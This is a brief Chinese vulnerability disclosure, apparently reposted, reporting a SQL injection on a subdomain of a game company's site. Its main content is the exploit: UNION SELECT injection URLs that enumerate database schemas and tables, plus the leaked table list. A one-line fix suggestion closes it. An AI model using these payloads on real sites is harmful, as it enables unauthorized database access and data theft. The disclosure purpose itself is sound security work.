所有数据库
漏洞证明: http://club.kok3.ztgame测试数据/index.php/Index/showGong/id/-516 UNION SELECT 1,2,3,4,database(),6,7,group_concat(schema_name),9,10,11,@@version,13 from information_schema.schemata 当前数据库存在的表 http://club.kok3.ztgame测试数据/index.php/Index/showGong/id/-516 UNION SELECT 1,2,3,4,database(),6,7,group_concat(table_name),9,10,11,@@version,13 from information_schema.tables where table_schema=database()
think_album, think_album_qun, think_app, think_attach, think_blog, think_boss, think_chat, think_code, think_comment, think_doing, think_email, think_file_group, think_game, think_gift, think_gift_category, think_gong, think_gong_ding, think_group, think_group_member, think_hello, think_image, think_jiazu, think_koc, think_love, think_magic, think_material, think_m 修复方案:对提交的参数进行相关过滤
查看更多关于巨人某分站存在伪静态注入及修复 - 网站安全的详细内容...